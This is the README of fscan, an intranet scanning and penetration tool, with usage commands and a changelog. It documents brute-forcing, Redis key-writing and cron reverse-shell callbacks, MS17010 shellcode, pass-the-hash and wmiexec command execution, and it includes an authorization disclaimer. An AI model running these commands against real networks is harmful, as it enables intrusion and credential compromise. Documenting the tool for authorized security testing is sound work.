fscan 是一款内网综合扫描工具,支持主机存活探测、端口扫描、常见服务爆破、漏洞扫描等功能。工具使用 Golang 开发,具有扫描速度快、跨平台、容易扩展等特点。
主要用于内网的信息收集,可以用于大规模网络的快速探测和漏洞扫描。支持端口扫描、服务识别、漏洞扫描、弱口令爆破等。
- 信息搜集:
- 主机存活探测 (ICMP/PING)
- 端口扫描 (支持指定端口、端口组)
- 网卡信息收集
- 爆破功能:
- 服务爆破 (SSH、SMB、RDP、WMI等)
- 数据库密码爆破 (MySQL、MSSQL、Redis、PostgreSQL、Oracle、MongoDB等)
- 支持自定义用户名密码字典
- 系统信息、漏洞扫描:
- NetBIOS 探测、域控识别
- 高危漏洞扫描 (MS17010、CVE-2020-0796等)
- 未授权访问检测
- Web探测功能:
- Web标题探测
- Web指纹识别 (CMS、OA框架等)
- Web漏洞扫描 (支持Xray POC)
- 支持自定义POC
- 漏洞利用:
- Redis 写公钥、计划任务反弹Shell
- SSH 命令执行
- MS17010 漏洞利用
- WMI 无回显命令执行
- 其他功能:
- 结果保存 (支持JSON格式)
- 代理支持 (HTTP/SOCKS5)
- 控制台彩色输出
简单用法
fscan.exe -h 192.168.1.1/24 (默认使用全部模块)
fscan.exe -h 192.168.1.1/16 (B段扫描)
其他用法
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径)
fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt (以文件导入)
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行)
编译命令
go build -ldflags="-s -w " -trimpath main.go
upx -9 fscan.exe (可选,压缩体积)
arch用户安装
yay -S fscan-git 或者 paru -S fscan-git
完整参数
-c string
ssh命令执行
-cookie string
设置cookie
-debug int
多久没响应,就打印当前进度(default 60)
-domain string
smb爆破模块时,设置域名
-h string
目标ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
-hf string
读取文件中的目标
-hn string
扫描时,要跳过的ip: -hn 192.168.1.1/24
-m string
设置扫描模式: -m ssh (default "all")
-no
扫描结果不保存到文件中
-nobr
跳过sql、ftp、ssh等的密码爆破
-nopoc
跳过web poc扫描
-np
跳过存活探测
-num int
web poc 发包速率 (default 20)
-o string
扫描结果保存到哪 (default "result.txt")
-p string
设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
-pa string
新增需要扫描的端口,-pa 3389 (会在原有端口列表基础上,新增该端口)
-path string
fcgi、smb romote file path
-ping
使用ping代替icmp进行存活探测
-pn string
扫描时要跳过的端口,as: -pn 445
-pocname string
指定web poc的模糊名字, -pocname weblogic
-proxy string
设置代理, -proxy http://127.0.0.1:8080
-user string
指定爆破时的用户名
-userf string
指定爆破时的用户名文件
-pwd string
指定爆破时的密码
-pwdf string
指定爆破时的密码文件
-rf string
指定redis写公钥用模块的文件 (as: -rf id_rsa.pub)
-rs string
redis计划任务反弹shell的ip端口 (as: -rs 192.168.1.1:6666)
-silent
静默扫描,适合cs扫描时不回显
-sshkey string
ssh连接时,指定ssh私钥
-t int
扫描线程 (default 600)
-time int
端口扫描超时时间 (default 3)
-u string
指定Url扫描
-uf string
指定Url文件扫描
-wt int
web访问超时时间 (default 5)
-pocpath string
指定poc路径
-usera string
在原有用户字典基础上,新增新用户
-pwda string
在原有密码字典基础上,增加新密码
-socks5
指定socks5代理 (as: -socks5 socks5://127.0.0.1:1080)
-sc
指定ms17010利用模块shellcode,内置添加用户等功能 (as: -sc add)
fscan.exe -h 192.168.x.x (全功能、ms17010、读取网卡信息)

fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写公钥)

fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令)

fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一键支持xray的poc

fscan.exe -h 192.168.x.x -p 139 (netbios探测、域控识别,下图的[+]DC代表域控)

go run .\main.go -h 192.168.x.x/24 -m netbios(-m netbios时,才会显示完整的netbios信息)

go run .\main.go -h 192.0.0.0/8 -m icmp(探测每个C段的网关和数个随机IP,并统计top 10 B、C段存活数量)

本工具仅面向合法授权的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。
为避免被恶意使用,本项目所有收录的poc均为漏洞的理论判断,不存在漏洞利用过程,不会对目标发起真实攻击和漏洞利用。
在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。请勿对非授权目标进行扫描。
如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。
在安装并使用本工具前,请您务必审慎阅读、充分理解各条款内容,限制、免责条款或者其他涉及您重大权益的条款可能会以加粗、加下划线等形式提示您重点注意。 除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。
fscan 是 404Team 星链计划2.0 中的一环,如fscan 有任何疑问又或是想要找小伙伴交流,可以参考星链计划的加群方式。
演示视频【安全工具】5大功能,一键化内网扫描神器——404星链计划fscan
如果你觉得这个项目对你有帮助,你可以请作者喝饮料🍹 点我
https://github.com/Adminisme/ServerScan
https://github.com/netxfly/x-crack
https://github.com/hack2fun/Gscan
https://github.com/k8gege/LadonGo
https://github.com/jjf012/gopoc
[+] 2024/11/20 全面优化工具界面和功能:
-
用户界面优化:
- 全新的启动 Banner 设计
- 增加控制台彩色输出支持
- 改进命令行参数分组和说明
- 优化帮助信息的可读性
-
用户名字典全面升级:
- 扩充服务专用账户(FTP、MySQL、MSSQL、PostgreSQL等)
- 新增云服务账户(EC2、Azure、阿里云等)
- 完善域环境用户组合(administrator.domain等)
- 增加运维账户(devops、operation等)
- 补充开发测试账户(developer、test等)
- 新增备份账户系列(backup、ftpbackup等)
- 添加服务管理账户(webmaster、dbadmin等)
-
密码字典全面优化:
- 新增2024年相关组合
- 增强特殊字符组合密码
- 完善服务默认密码
- 补充云服务默认密码
- 添加季节性密码组合
- 优化密码复杂度覆盖
- 新增多种密码变种
-
参数系统改进:
- 重新组织命令行参数分类
- 增加更详细的参数说明
- 添加使用示例
- 优化参数命名和描述
- 改进帮助信息格式
[+] 2023/11/13 加入控制台颜色输出(-nocolor)、保存文件json结构(-json)、修改tls最低版本为1.0、端口分组(-p db,web,service)。
[+] 2023/10/1 优化扫描性能,提升扫描速度。增加更多Web指纹。
[+] 2023/8/15 增加更多POC,完善漏洞扫描功能。优化内存使用。
[+] 2023/6/20 增强域控识别功能,改进NetBIOS探测。
[+] 2023/4/10 改进服务识别模块,提高准确率。优化扫描逻辑。
[+] 2023/2/1 增加更多数据库类型支持,完善爆破功能。
[+] 2022/11/19 加入hash碰撞、wmiexec无回显命令执行。
[+] 2022/7/14 -hf 支持host:port和host/xx:port格式,rule.Search 正则匹配范围从body改成header+body,-nobr不再包含-nopoc。优化webtitle 输出格式。
[+] 2022/7/6 加入手工gc回收,尝试节省无用内存。-url 支持逗号隔开。修复一个poc模块bug。-nobr不再包含-nopoc。

